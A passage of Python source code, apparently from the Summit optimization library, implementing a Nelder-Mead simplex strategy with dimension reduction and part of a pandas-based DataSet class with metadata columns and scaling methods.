self.xbest = xbest
self.prev_param = param
return next_experiments
def reset(self):
"""Reset internal parameters"""
self.prev_param = None
def to_dict(self):
# Previous param first element is a dictionary of internal parameters
# Second element is a dataset with invalid experiments
if self.prev_param is not None:
prev_param = [
jsonify_dict(self.prev_param[0]),
self.prev_param[1].to_dict(),
]
else:
prev_param = None
strategy_params = dict(
x_start=self._x_start,
random_start=self.random_start,
dx=self._dx,
df=self._df,
adaptive=self._adaptive,
prev_param=prev_param,
)
return super().to_dict(**strategy_params)
@classmethod
def from_dict(cls, d):
nm = super().from_dict(d)
prev_param = d["strategy_params"]["prev_param"]
if prev_param is not None:
nm.prev_param = [
unjsonify_dict(prev_param[0]),
DataSet.from_dict(prev_param[1]),
]
return nm
def _inner_suggest_experiments(self, prev_res: DataSet = None, prev_param=None):
"""Inner loop for suggestion of experiments using Nelder-Mead Simplex method
Parameters
----------
prev_res: summit.utils.data.DataSet, optional
Dataset with data from previous experiments.
If no data is passed, the Nelder-Mead optimization algorithm
will be initialized and suggest initial experiments.
prev_param:
Parameters of Nelder-Mead algorithm from previous
iterations of a optimization problem.
If no data is passed, the Nelder-Mead optimization algorithm
will be initialized.
"""
# intern
stay_inner = False
# Get bounds of input variables
bounds = []
input_var_names = []
output_var_names = []
for v in self.domain.variables:
if not v.is_objective:
if isinstance(v, ContinuousVariable):
bounds.append(v.bounds)
input_var_names.append(v.name)
elif isinstance(v, CategoricalVariable):
if v.ds is not None:
descriptor_names = v.ds.data_columns
descriptors = np.asarray(
[
v.ds.loc[:, [l]].values.tolist()
for l in v.ds.data_columns
]
)
else:
raise ValueError("No descriptors given for {}".format(v.name))
for d in descriptors:
bounds.append([np.min(np.asarray(d)), np.max(np.asarray(d))])
input_var_names.extend(descriptor_names)
else:
raise TypeError(
"Nelder-Mead can not handle variable type: {}".format(v.type)
)
else:
output_var_names.extend(v.name)
bounds = np.asarray(bounds, dtype=float)
# Extract dimension of input domain
dim = len(bounds[:, 0])
# Initialization
initial_run = True
x0 = [self._x_start]
y0 = []
# Get previous results
if prev_res is not None:
initial_run = False
inputs, outputs = self.transform.transform_inputs_outputs(
prev_res, categorical_method="descriptors"
)
# Set up maximization and minimization
for v in self.domain.variables:
if v.is_objective and v.maximize:
outputs[v.name] = -1 * outputs[v.name]
x0 = inputs.data_to_numpy()
y0 = outputs.data_to_numpy()
elif prev_param is not None:
raise ValueError(
"Parameter from previous optimization iteration are given but previous results are "
"missing!"
)
# if no previous results are given initialize center point as geometrical middle point of bounds
if len(x0[0]) == 0 and not self.random_start:
x0 = np.ones((1, len(bounds))) * 0.5 * ((bounds[:, 1] + bounds[:, 0]).T)
elif len(x0[0]) == 0 and self.random_start:
weight = np.random.rand()
x0 = np.ones((1, len(bounds))) * (
weight * (bounds[:, 1] + (1 - weight) * bounds[:, 0]).T
)
""" Set Nelder-Mead parameters, i.e., initialize or include data from previous iterations
--------
prev_sim: array-like
variable coordinates (points) of simplex from previous run
prev_fsim: array-like
function values corresponding to points of simplex from previous run
x_iter: array-like
variable coordinates and corresponding function values of potential new
simplex points determined in one iteration of the NMS algorithm; note that
within one iteration multiple points need to be evaluated; that's why we have
to store the points of an unfinished iteration (start iteration -> request point
-> run experiment -> restart same iteration with results of experiment
-> request point -> run experiment ... -> finish iteration)
red_dim: boolean
True if dimension was reduced in one of the previous iteration and has not been recovered yet
red_sim: array-like
variable coordinates (points) of simplex before dimension was reduced
red_fsim: array-like
function values of points corresponding to simplex before dimension was reduced
rec_dim: boolean
True if dimension was revocered in last iteration
memory: array-like
list of all points for which the function was evaluated
"""
prev_sim, prev_fsim, x_iter, red_dim, red_sim, red_fsim, rec_dim, memory = (
None,
None,
None,
None,
None,
None,
None,
[np.ones(dim) * float("inf")],
)
# if this is not the first iteration of the Nelder-Mead algorithm, get parameters from previous iteration
if prev_param:
prev_sim = prev_param["sim"]
red_dim = prev_param["red_dim"]
red_sim = prev_param["red_sim"]
red_fsim = prev_param["red_fsim"]
rec_dim = prev_param["rec_dim"]
memory = prev_param["memory"]
# if dimension was recovered in last iteration, N functions evaluations were requested
# that need to be assigned to the respective points in the simplex
if rec_dim:
prev_fsim = prev_param["fsim"]
for k in range(len(x0)):
for s in range(len(prev_sim)):
if np.array_equal(prev_sim[s], x0[k]):
prev_fsim[s] = y0[k]
rec_dim = False
# assign function values to respective points
elif prev_param["fsim"] is not None:
prev_fsim = prev_param["fsim"]
x_iter = prev_param["x_iter"]
for key, value in x_iter.items():
if value is not None:
if key == "x_shrink":
for k in range(len(x0)):
for j in range(len(value)):
if np.array_equal(value[j][0], np.asarray(x0[k])):
x_iter[key][j][1] = y0[k]
else:
for k in range(len(x0)):
if np.array_equal(value[0], np.asarray(x0[k])):
x_iter[key][1] = y0[k]
break
else:
prev_fsim = y0
# initialize with given simplex points (including function evaluations) for initialization
elif prev_res is not None:
prev_sim = x0
prev_fsim = y0
for p in x0.astype(float).tolist():
memory.append(p)
# Run Nelder-Mead Simplex algorithm for one iteration
overfull_simplex = False
if not red_dim:
request, sim, fsim, x_iter = self._minimize_neldermead(
x0=x0[0],
bounds=bounds,
x_iter=x_iter,
f=prev_fsim,
sim=prev_sim,
adaptive=self._adaptive,
)
if not initial_run:
(
overfull_simplex,
prev_sim,
prev_fsim,
red_sim,
red_fsim,
overfull_dim,
) = self.check_overfull(request, sim, fsim, bounds)
## Reduce dimension if n+1 points are located in n-1 dimensions (if either red_dim = True, i.e.,
# optimization in the reduced dimension space was not finished in the last iteration, or overfull_simplex, i.e.,
# last Nelder-Mead call (with red_dim = False) lead to an overfull simplex).
## Note that in order to not loose any information, the simplex without dimension reduction is returned even
# if the optimization in the reduced dimension space is not finished.
## If the optimization in the reduced dimension space was not finished in the last iteration (red_dim = True),
# the simplex will automatically be reduced again.
if red_dim or overfull_simplex:
# prepare dimension reduction
if red_dim:
x_iter, overfull_dim = self.upstream_simplex_dim_red(prev_sim, x_iter)
else:
x_iter = None
# save value of dimension reduced
save_dim = prev_sim[0][overfull_dim]
# delete overfull dimension
new_prev_sim = np.delete(prev_sim, overfull_dim, 1)
# delete bounds for overfull dimension
new_bounds = np.delete(bounds, overfull_dim, 0)
# Run one iteration of Nelder-Mead Simplex algorithm for reduced simplex
request, sim, fsim, x_iter = self._minimize_neldermead(
x0=new_prev_sim[0],
x_iter=x_iter,
bounds=new_bounds,
f=prev_fsim,
sim=new_prev_sim,
adaptive=self._adaptive,
)
overfull_simplex, _, _, _, _, _ = self.check_overfull(
request, sim, fsim, bounds
)
if overfull_simplex:
raise NotImplementedError(
"Recursive dimension reduction not implemented yet."
)
# recover dimension after Nelder-Mead Simplex run (to return full request for experiment)
request = np.insert(request, overfull_dim, save_dim, 1)
sim = np.insert(sim, overfull_dim, save_dim, 1)
# follow-up of dimension reduction
x_iter = self.downstream_simplex_dim_red(x_iter, overfull_dim, save_dim)
red_dim = True
# if not overfull and no reduced dimension from previous iteration
else:
red_dim = False
# Circle (suggested point that already has been investigated)
if any(np.array([np.array(memory == x).all(1).any() for x in request])):
## if dimension is reduced and requested point has already been evaluated, recover dimension with
# reflected and translated simplex before dimension reduction
if red_dim:
sim, fsim, request = self.recover_simplex_dim(
sim, red_sim, red_fsim, overfull_dim, bounds, memory, self._dx
)
red_dim = False
rec_dim = True
# raise error
else:
stay_inner = True
# raise NotImplementedError("Circle - point has already been investigated.")
## Only little changes in requested points, xatol = tolerance for changes in x,
# or in function values, fatol = tolerance for changes in f
## TODO: add extra threshold to stop reduced dimension problem and recover dimension
if not initial_run:
xatol = (bounds[:, 1] - bounds[:, 0]) * self._dx
fatol = self._df
if (np.max(np.abs(sim[1:] - sim[0]), 0) <= xatol).all() or (
np.max(np.abs(fsim[0] - fsim[1:])) <= fatol
).any():
if red_dim:
sim, fsim, request = self.recover_simplex_dim(
sim, red_sim, red_fsim, overfull_dim, bounds, memory, self._dx
)
red_dim = False
rec_dim = True
else:
print(
"Warning, internal stopping criterion is reached. "
"Either points of simplex or function values of points of simplex are very close to each other."
)
# add requested points to memory
for p in request.astype(float).tolist():
memory.append(p)
# store parameters of iteration as parameter array
param = [sim, fsim, x_iter, red_dim, red_sim, red_fsim, rec_dim, memory]
param = dict(
sim=sim,
fsim=fsim,
x_iter=x_iter,
red_dim=red_dim,
red_sim=red_sim,
red_fsim=red_fsim,
rec_dim=rec_dim,
memory=memory,
)
# Generate DataSet object with variable values of next experiments
next_experiments = {}
for i, v in enumerate(input_var_names):
next_experiments[v] = request[:, i]
next_experiments = DataSet.from_df(pd.DataFrame(data=next_experiments))
# Violate constraint
mask_valid_next_experiments = self.check_constraints(next_experiments)
if initial_run and not all(mask_valid_next_experiments):
raise ValueError(
"Default initialization failed due to constraints. Please enter an initial simplex with feasible points"
)
if not any(mask_valid_next_experiments):
stay_inner = True
if stay_inner:
# add infinity as
next_experiments[("constraint", "DATA")] = False
else:
# add optimization strategy
next_experiments[("constraint", "DATA")] = mask_valid_next_experiments
next_experiments[("strategy", "METADATA")] = ["Nelder-Mead Simplex"] * len(
request
)
x_best = None
f_best = float("inf")
# fbest corresponds to the transformed function values
if not initial_run:
x_best = sim[0]
f_best = fsim[0]
x_best = self.round(x_best, bounds, self._dx)
f_best = int(f_best * 10 ** int(np.log10(1 / self._df))) / 10 ** int(
np.log10(1 / self._df)
)
# next_experiments = np.around(next_experiments, decimals=self._dx)
# Do any necessary transformation back
next_experiments = self.transform.un_transform(
next_experiments, categorical_method="descriptors"
)
return next_experiments, x_best, f_best, param
# implementation partly follows: https://github.com/scipy/scipy/blob/master/scipy/optimize/optimize.py
def _minimize_neldermead(
self,
x0,
bounds,
x_iter=None,
f=None,
sim=None,
initial_simplex=None,
adaptive=False,
**unknown_options
):
"""
Minimization of scalar function of one or more variables using the
Nelder-Mead algorithm.
Options
-------
x0: array_like of shape (1, N)
x_iter:
f:
sim:
initial_simplex : array_like of shape (N + 1, N)
Initial simplex. If given, overrides `x0`.
``initial_simplex[j,:]`` should contain the coordinates of
the jth vertex of the ``N+1`` vertices in the simplex, where
``N`` is the dimension.
adaptive : bool, optional
Adapt algorithm parameters to dimensionality of problem. Useful for
high-dimensional minimization [1].
References
----------
.. [1] <NAME>. and <NAME>.
Implementing the Nelder-Mead simplex algorithm with adaptive
parameters. 2012. Computational Optimization and Applications.
51:1, pp. 259-277
"""
if adaptive:
dim = float(len(x0))
rho = 1
chi = 1 + 2 / dim
psi = 0.75 - 1 / (2 * dim)
sigma = 1 - 1 / dim
else:
rho = 1
chi = 2
psi = 0.5
sigma = 0.5
# TODO: discuss hyperparameter, find literature
zdelt = 0.25
x0 = np.asfarray(x0).flatten()
N = len(x0)
# generate N points based on center point, each point varying in
# one different variable compared to center point -> initial simplex with N+1 points
if initial_simplex is None and sim is None:
sim = np.zeros((N + 1, N), dtype=x0.dtype)
sim[0] = x0
for k in range(N):
y = np.array(x0, copy=True)
y[k] = y[k] + zdelt * 1 / 2 * (bounds[k, 1] - bounds[k, 0])
bool, _, _ = self.check_bounds(y, bounds)
# if point violates bound restriction, change variable in opposite direction
if not bool:
y[k] = y[k] - zdelt * (bounds[k, 1] - bounds[k, 0])
# if point violates constraint, try opposite direction
# if point violates other constraint or bound, calculate max zdelt <zdelt_mod> that meets
# constraint for both direction and choose direction with greater zdelt_mod
# TODO: check constraints
sim[k + 1] = y
return sim, sim, None, None
elif sim is None:
sim = np.asfarray(initial_simplex).copy()
if sim.ndim != 2 or sim.shape[0] != sim.shape[1] + 1:
raise ValueError(
"`initial_simplex` should be an array of shape (N+1,N)"
)
if len(x0) != sim.shape[1]:
raise ValueError(
"Size of `initial_simplex` is not consistent with `x0`"
)
N = sim.shape[1]
else:
sim = np.asfarray(sim).copy()
if sim.ndim != 2 or sim.shape[0] != sim.shape[1] + 1:
raise ValueError(
"`initial_simplex` should be an array of shape (N+1,N)"
)
if len(x0) != sim.shape[1]:
raise ValueError(
"Size of `initial_simplex` is not consistent with `x0`"
)
N = sim.shape[1]
one2np1 = list(range(1, N + 1))
fsim = np.zeros((N + 1,), float)
for k in range(N + 1):
fsim[k] = f[k]
ind = np.argsort(fsim)
fsim = np.take(fsim, ind, 0)
sim = np.take(sim, ind, 0)
# Catch information on previous experiment
if not x_iter:
x_iter = {
"xbar": None,
"xr": None,
"xe": None,
"xc": None,
"xcc": None,
"x_shrink": None,
}
# Iteration
while 1:
if not x_iter["xr"]:
# Centroid point: xbar
xbar = np.add.reduce(sim[:-1], 0) / N
xbar = self.round(xbar, bounds, self._dx)
x_iter["xbar"] = xbar
# Reflection point xr
xr = (1 + rho) * xbar - rho * sim[-1]
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xr, bounds)
if _bool:
break
else:
tmp_rho = np.min(
np.max(np.abs((bounds[i][b] - xbar[i])))
/ np.max(np.abs((xbar[i] - sim[-1][i])))
)
xr = (1 + tmp_rho) * xbar - tmp_rho * sim[-1]
xr = self.round(xr, bounds, self._dx)
x_iter["xr"] = [xr, None]
return np.asarray([xr]), sim, fsim, x_iter
xr = x_iter["xr"][0]
fxr = x_iter["xr"][1]
doshrink = 0
# if function value of reflected point is better than best point of simplex, determine expansion point
if fxr < fsim[0]:
if not x_iter["xe"]:
# expansion point: xe
xbar = x_iter["xbar"]
xe = xr + chi * xbar - chi * sim[-1]
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xe, bounds)
if _bool:
break
else:
tmp_chi = np.min(
np.max(np.abs((bounds[i][b] - xr[i])))
/ np.max(np.abs((xbar[i] - sim[-1][i])))
)
xe = xr + tmp_chi * xbar - tmp_chi * sim[-1]
xe = self.round(xe, bounds, self._dx)
if np.array_equal(xe, xr):
x_iter["xe"] = [xe, float("inf")]
else:
x_iter["xe"] = [xe, None]
return np.asarray([xe]), sim, fsim, x_iter
xe = x_iter["xe"][0]
fxe = x_iter["xe"][1]
# if expansion point is better than reflected point,
# replace worst point of simplex by expansion point
if fxe < fxr:
sim[-1] = xe
fsim[-1] = fxe
# if reflected point is better than expansion point,
# replace worst point of simplex by reflected point
else:
sim[-1] = xr
fsim[-1] = fxr
# if function value of reflected point is not better than best point of simplex...
else: # fsim[0] <= fxr
# ... but better than second worst point,
# replace worst point of simplex by reflected point
if fxr < fsim[-2]:
sim[-1] = xr
fsim[-1] = fxr
# ... and not better than second worst point
else: # fxr >= fsim[-2]
# Perform contraction
# if reflected point is better than worst point
if fxr < fsim[-1]:
# contracted point: xc
if not x_iter["xc"]:
xbar = x_iter["xbar"]
# avoid division with zero (some coordinates of xbar, xr, and sim[-1] may be identical)
# by applying np.max and np.min
rho = np.min(
np.max(np.abs(xr - xbar))
/ np.max(np.abs((xbar - sim[-1])))
)
xc = (1 + psi * rho) * xbar - psi * rho * sim[-1]
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xc, bounds)
if _bool:
break
else:
tmp_psi = np.min(
np.max(np.abs((bounds[i][b] - xr[i])))
/ np.max(np.abs((xbar[i] - sim[-1][i])))
)
xc = (
1 + tmp_psi * rho
) * xbar - tmp_psi * rho * sim[-1]
xc = self.round(xc, bounds, self._dx)
if np.array_equal(xc, xr):
x_iter["xc"] = [xc, float("inf")]
else:
x_iter["xc"] = [xc, None]
return np.asarray([xc]), sim, fsim, x_iter
xc = x_iter["xc"][0]
fxc = x_iter["xc"][1]
# if contracted point is better than reflected point
if fxc <= fxr:
sim[-1] = xc
fsim[-1] = fxc
else:
doshrink = 1
# if reflected point is better than worst point
else:
# Perform an inside contraction
if not x_iter["xcc"]:
xbar = x_iter["xbar"]
xcc = (1 - psi) * xbar + psi * sim[-1]
xcc = self.round(xcc, bounds, self._dx)
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xcc, bounds)
if _bool:
break
else:
tmp_psi = np.min(
np.max(np.abs((bounds[i][b] - xbar[i])))
/ np.max(np.abs((sim[-1][i] - xbar[i])))
)
xcc = (1 - tmp_psi) * xbar + tmp_psi * sim[-1]
xcc = self.round(xcc, bounds, self._dx)
if np.array_equal(xcc, xr):
x_iter["xcc"] = [xcc, None]
else:
x_iter["xcc"] = [xcc, None]
return np.asarray([xcc]), sim, fsim, x_iter
xcc = x_iter["xcc"][0]
fxcc = x_iter["xcc"][1]
if fxcc < fsim[-1]:
sim[-1] = xcc
fsim[-1] = fxcc
else:
doshrink = 1
# shrink simplex for all x
if doshrink:
x_shrink = []
x_shrink_f = []
if not x_iter["x_shrink"]:
for j in one2np1:
sim[j] = sim[0] + sigma * (sim[j] - sim[0])
xj = sim[j]
xj = self.round(xj, bounds, self._dx)
x_shrink.append(xj)
x_shrink_f.append([xj, None])
x_iter["x_shrink"] = x_shrink_f
return np.asarray(x_shrink), sim, fsim, x_iter
for j in one2np1:
sim[j] = x_iter["x_shrink"][j - 1][0]
fsim[j] = x_iter["x_shrink"][j - 1][1]
x_iter = {
"xbar": None,
"xr": None,
"xe": None,
"xc": None,
"xcc": None,
"x_shrink": None,
}
ind = np.argsort(fsim)
sim = np.take(sim, ind, 0)
fsim = np.take(fsim, ind, 0)
# Function to check whether a point x lies within the variable bounds of the domain
def check_bounds(self, x, bounds):
for i, b in enumerate(bounds):
upper_b = b[1] < x[i]
lower_b = b[0] > x[i]
# Point violated bound constraints
if upper_b or lower_b:
if lower_b:
return False, i, 0
else:
return False, i, 1
return True, None, None
# Function to check whether a point meets the constraints of the domain
def check_constraints(self, tmp_next_experiments):
constr_mask = np.asarray([True] * len(tmp_next_experiments)).T
if len(self.domain.constraints) > 0:
constr = [c.constraint_type + "0" for c in self.domain.constraints]
constr_mask = [
pd.eval(c.lhs + constr[i], resolvers=[tmp_next_experiments])
for i, c in enumerate(self.domain.constraints)
]
constr_mask = np.asarray([c.tolist() for c in constr_mask]).T
constr_mask = constr_mask.all(1)
return constr_mask
# Function to check whether a simplex contains only points that are identical in one dimension and the
# the variable value fo this dimension corresponds to the bound value
def check_overfull(self, tmp_request, tmp_sim, tmp_fsim, bounds):
test_sim = np.asarray(tmp_sim[:-1])
overfull_sim_dim = np.all(test_sim == test_sim[0, :], axis=0)
for i in range(len(overfull_sim_dim)):
if overfull_sim_dim[i]:
if tmp_request[0][i] == test_sim[0][i]:
if any(bounds[i] == test_sim[0][i]):
overfull_dim = i
prev_sim = tmp_sim[:-1]
prev_fsim = tmp_fsim[:-1]
red_sim = tmp_sim
red_fsim = tmp_fsim
return (
True,
prev_sim,
prev_fsim,
red_sim,
red_fsim,
overfull_dim,
)
else:
raise ValueError(
"Simplex is overfull in one dimension. Please increase threshold for stopping."
)
return False, None, None, None, None, None
# Prepare Nelder-Mead parameters and previous results for dimension reduction by removing overfull dimension
def upstream_simplex_dim_red(self, tmp_prev_sim, tmp_x_iter):
tmp_x_iter = tmp_x_iter
overfull_sim_dim = np.all(tmp_prev_sim == tmp_prev_sim[0, :], axis=0)
overfull_dim = np.where(overfull_sim_dim)[0][0]
if tmp_x_iter:
for key, value in tmp_x_iter.items():
if value is not None:
if key is "xbar":
tmp_x_iter[key] = np.delete(value, overfull_dim)
continue
if key is "x_shrink":
for v in range(len(value)):
tmp_x_iter[key][v] = [
np.delete(value[v][0], overfull_dim),
value[v][1],
]
continue
tmp_x_iter[key] = [np.delete(value[0], overfull_dim), value[1]]
return tmp_x_iter, overfull_dim
else:
return None, overfull_dim
# Restore simplex after one call of Nelder-Mead with reduced dimension by adding overfull dimension.
## Note that if dimension reduction process is not finished, the simplex will reduced in the
# next Nelder-Mead call again.
def downstream_simplex_dim_red(self, tmp_x_iter, overfull_dim, save_dim):
for key, value in tmp_x_iter.items():
if value is not None:
if key is "xbar":
tmp_x_iter[key] = np.insert(value, overfull_dim, save_dim)
continue
if key is "x_shrink":
for v in range(len(value)):
tmp_x_iter[key][v] = [
np.insert(value[v][0], overfull_dim, save_dim),
value[v][1],
]
continue
tmp_x_iter[key] = [
np.insert(value[0], overfull_dim, save_dim),
value[1],
]
return tmp_x_iter
## Reflect and translate simplex from iteration before dimension with respect to the point that was found in the
# reduced dimension problem.
def recover_simplex_dim(
self, tmp_sim, tmp_red_sim, tmp_red_fsim, overfull_dim, bounds, memory, dx
):
## Translate all points of the simplex before the reduction along the axis of the reduced dimension
# but the one, that caused dimension reduction (translation distance corresponds to distance of point, that
# caused the dimension reduction, to the values of all other points at axis of the reduced dimension)
xr_red_dim = tmp_red_sim[-1][overfull_dim] - tmp_red_sim[0][overfull_dim]
xr_red_dim = self.round(
xr_red_dim, np.asarray([len(bounds) * [float("-inf"), float("inf")]]), dx
)
new_sim = tmp_red_sim.copy()
new_sim[:-1][:, [overfull_dim]] = (
tmp_red_sim[:-1][:, [overfull_dim]] + xr_red_dim
)
## Translate all points of the simplex before the reduction along the remaining axes but the one, that caused
# dimension reduction (translation distance corresponds to distance of point, that caused the dimension
# reduction, to optimal point found in reduced space optimization)
for dim in range(len(tmp_red_sim[0])):
if dim == overfull_dim:
continue
else:
xt_red_dim = tmp_red_sim[-1][dim] - tmp_sim[0][dim]
xt_red_dim = self.round(
xt_red_dim,
np.asarray([len(bounds) * [float("-inf"), float("inf")]]),
dx,
)
for s in range(len(new_sim[:-1])):
xs = tmp_red_sim[s][dim] - xt_red_dim
# TODO: check bounds here, what happens if more points violate bound constraints)
if bounds[dim][0] > xs:
xs = bounds[dim][0]
elif bounds[dim][1] < xs:
xs = bounds[dim][1]
new_sim[s][dim] = xs
# Alter simplex in case one point is twice into recovered simplex due to bound constraints
p = 0
c_i = 0
while p < len(new_sim) and c_i < len(new_sim):
l_new_sim = new_sim.tolist()
x = l_new_sim.count(l_new_sim[p])
if x > 1:
t_x = l_new_sim[p]
for dim in range(len(t_x)):
if t_x[dim] == bounds[dim, 0]:
new_sim[p][dim] = new_sim[p][dim] + 0.25 * 1 / 2 * (
bounds[dim, 1] - bounds[dim, 0]
)
new_sim[p] = self.round(new_sim[p], bounds, self._dx)
p = 0
c_i += 1
elif t_x[dim] == bounds[dim, 1]:
new_sim[p][dim] = new_sim[p][dim] - 0.25 * 1 / 2 * (
bounds[dim, 1] - bounds[dim, 0]
)
new_sim[p] = self.round(new_sim[p], bounds, self._dx)
p = 0
c_i += 1
else:
c_i += 1
else:
p += 1
new_sim[-1] = tmp_sim[0]
sim = new_sim
fsim = tmp_red_fsim
fsim[-1] = fsim[0]
request = sim[:-1]
if any((memory == x).all(1).any() for x in request):
len_req = len(request)
len_req_mod = len_req
i = 0
while i < len_req_mod:
if (memory == request[i]).all(1).any():
fsim[i + len_req - len_req_mod] = float("inf")
request = np.delete(request, i, 0)
len_req_mod -= 1
else:
i += 1
if len_req_mod == 0:
raise ValueError(
"Recovering dimension failed due to error in generating new points. "
"Please increase threshold for stopping."
)
return sim, fsim, request
# adapted from the SQSnobFit package
def round(self, x, bounds, dx):
"""
function x = round(x, bounds, dx)
A point x is projected into the interior of [u, v] and x[i] is
rounded to the nearest integer multiple of dx[i].
Input:
x vector of length n
bounds matrix of length nx2 such that bounds[:,0] < bounds[:,1]
dx float
Output:
x projected and rounded version of x
"""
u = bounds[:, 0]
v = bounds[:, 1]
x = np.minimum(np.maximum(x, u), v)
x = np.round(x / dx) * dx
i1 = self.find(x < u)
if i1.size > 0:
x[i1] = x[i1] + dx
i2 = self.find(x > v)
if i2.size > 0:
x[i2] = x[i2] - dx
return x
# adapted from the SQSnobFit package
def find(self, cond_array):
return (np.transpose(np.nonzero(cond_array.flatten()))).astype(int)
```
#### File: summit/utils/dataset.py
```python
import pandas as pd
import numpy as np
from typing import List
class DataSet(pd.core.frame.DataFrame):
"""A represenation of a dataset
This is basically a pandas dataframe with a set of "metadata" columns
that will be removed when the dataframe is converted to a numpy array
Two-dimensional size-mutable, potentially heterogeneous tabular data
structure with labeled axes (rows and columns). Arithmetic operations
align on both row and column labels. Can be thought of as a dict-like
container for Series objects. The primary pandas data structure.
Parameters
----------
data : ndarray (structured or homogeneous), Iterable, dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : Index or array-like
Index to use for resulting frame. Will default to RangeIndex if
no indexing information part of input data and no index provided
columns : Index or array-like
Column labels to use for resulting frame. Will default to
RangeIndex (0, 1, 2, ..., n) if no column labels are provided
metadata_columns : Array-like
A list of metadata columns that are already contained in the columns parameter.
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
See Also
--------
DataFrame.from_records : Constructor from tuples, also record arrays.
DataFrame.from_dict : From dicts of Series, arrays, or dicts.
DataFrame.from_items : From sequence of (key, value) pairs
pandas.read_csv, pandas.read_table, pandas.read_clipboard.
Notes
----
Based on https://notes.mikejarrett.ca/storing-metadata-in-pandas-dataframes/
"""
def __init__(
self,
data=None,
index=None,
columns=None,
metadata_columns=[],
units=None,
dtype=None,
copy=False,
):
# Column multindex level names
level_names = ["NAME", "TYPE"]
if units:
names.append("UNITS")
if isinstance(columns, pd.MultiIndex):
pass
elif columns is not None:
column_names = columns
if metadata_columns:
types = [
"METADATA" if x in metadata_columns else "DATA"
for x in column_names
]
else:
types = ["DATA" for _ in range(len(column_names))]
arrays = [column_names, types]
if units:
arrays.append(units)
tuples = list(zip(*arrays))
columns = pd.MultiIndex.from_tuples(tuples, names=level_names)
pd.core.frame.DataFrame.__init__(
self, data=data, index=index, columns=columns, dtype=dtype, copy=copy
)
@staticmethod
def from_df(df: pd.DataFrame, metadata_columns: List = [], units: List = []):
"""Create Dataset from a pandas dataframe
Arguments
----------
df: pandas.DataFrame
Dataframe to be converted to a DataSet
metadata_columns: list, optional
names of the columns in the dataframe that are metadata columns
units: list, optional
A list of objects representing the units of the columns
"""
column_names = df.columns.to_numpy()
if metadata_columns:
types = [
"METADATA" if x in metadata_columns else "DATA" for x in df.columns
]
else:
types = ["DATA" for _ in range(len(column_names))]
arrays = [column_names, types]
levels = ["NAME", "TYPE"]
if units:
arrays.append(units)
levels.append("UNITS")
tuples = list(zip(*arrays))
columns = pd.MultiIndex.from_tuples(tuples, names=levels)
return DataSet(df.to_numpy(), columns=columns, index=df.index)
@staticmethod
def read_csv(filepath_or_buffer, **kwargs):
"""Create a DataSet from a csv"""
header = kwargs.get("header", [0, 1])
index_col = kwargs.get("index_col", 0)
df = pd.read_csv(filepath_or_buffer, header=header, index_col=index_col)
return DataSet(df.to_numpy(), columns=df.columns, index=df.index)
def to_dict(self, **kwargs):
orient = kwargs.get("orient", "split")
return super().to_dict(orient=orient)
@classmethod
def from_dict(cls, d):
columns = []
metadata_columns = []
for c in d["columns"]:
if c[1] == "METADATA":
metadata_columns.append(c[0])
columns = [c[0] for c in d["columns"]]
return DataSet(
d["data"],
index=d["index"],
columns=columns,
metadata_columns=metadata_columns,
)
def zero_to_one(self, small_tol=1.0e-5, return_min_max=False) -> np.ndarray:
"""Scale the data columns between zero and one
Each of the data columns is scaled between zero and one
based on the maximum and minimum values of each column
Arguments
---------
small_tol: float, optional
The minimum value of any value in the final scaled array.
This is used to prevent very small values that will cause
issues in later calcualtions. Defaults to 1e-5.
Returns
-------
scaled: numpy.ndarray
A numpy array with the scaled data columns
if return_min_max true returns a tuple of scaled, mins, maxes
Notes
-----
This method does not change the internal values of the data columns in place.
"""
values = self.data_to_numpy()
values = values.astype(np.float64)
maxes = np.max(values, axis=0)
mins = np.min(values, axis=0)
ranges = maxes - mins
scaled = (values - mins) / ranges
scaled[abs(scaled) < small_tol] = 0.0
if return_min_max:
return scaled, mins, maxes
else:
return scaled
def standardize(
self, small_tol=1.0e-5, return_mean=False, return_std=False, **kwargs
) -> np.ndarray:
"""Standardize data columns by removing the mean and scaling to unit variance
The standard score of each data column is calculated as:
z = (x - u) / s
where `u` is the mean of the columns and `s` is the standard deviation of
each data column
Parameters
----------
small_tol: float, optional
The minimum value of any value in the final scaled array.
This is used to prevent very small values that will cause
issues in later calcualtions. Defaults to 1e-5.
return_mean: bool, optional
Return an array with the mean of each column in the DataSet
return_std: bool, optional
Return an array with the stnadard deviation of each column
in the DataSet
mean: array, optional
Pass a precalculated array of means for the columns
std: array, optional
Pass a precalculated array of standard deviations
for the columns
Returns
-------
standard: np.ndarray
Numpy array of the standardized data columns
Notes
-----
This method does not change the internal values of the data columns in place.
"""
values = self.data_to_numpy()
values = values.astype(np.float64)
mean = kwargs.get("mean", np.mean(values, axis=0))
sigma = kwargs.get("std", np.std(values, axis=0))
standard = (values - mean) / sigma
standard[abs(standard) < small_tol] = 0.0
if return_mean and return_std:
return standard, mean, sigma
elif return_mean:
return standard, mean
elif return_std:
return standard, sigma
else:
return standard
@property
def _constructor(self):
return DataSet
def __getitem__(self, key):
is_mi_columns = isinstance(self.columns, pd.MultiIndex)
if is_mi_columns and "NAME" in self.columns.names and type(key) == str:
tupkey = [x for x in self.columns if x[0] == key]
if len(tupkey) == 1:
key = tupkey[0]
elif len(tupkey) > 1:
raise ValueError("NAME level column labels must be unique")
return super().__getitem__(key)
def __unicode__(self):
is_mi_columns = isinstance(self.columns, pd.MultiIndex)
if is_mi_columns and "NAME" in self.columns.names:
newdf = self.copy()
newdf.columns = self.columns.get_level_values("NAME")
return newdf.__unicode__()
return super().__unicode__()
def _repr_html_(self):
is_mi_columns = isinstance(self.columns, pd.MultiIndex)
if is_mi_columns and "NAME" in self.columns.names:
newdf = self.copy()
columns = self.columns.get_level_values("NAME").to_numpy()
newdf.columns = columns
return newdf._repr_html_()
return super()._repr_html_()
def data_to_numpy(self) -> int:
"""Return dataframe with the metadata columns removed"""
result = super().to_numpy()
metadata_columns = []
for i, column in enumerate(self.columns):
if column[1] == "METADATA":
metadata_columns.append(i)
mask = np.ones(len(self.columns), dtype=bool)
mask[metadata_columns] = False
return result[:, mask]
@property
def metadata_columns(self):
"""Names of the metadata columns"""
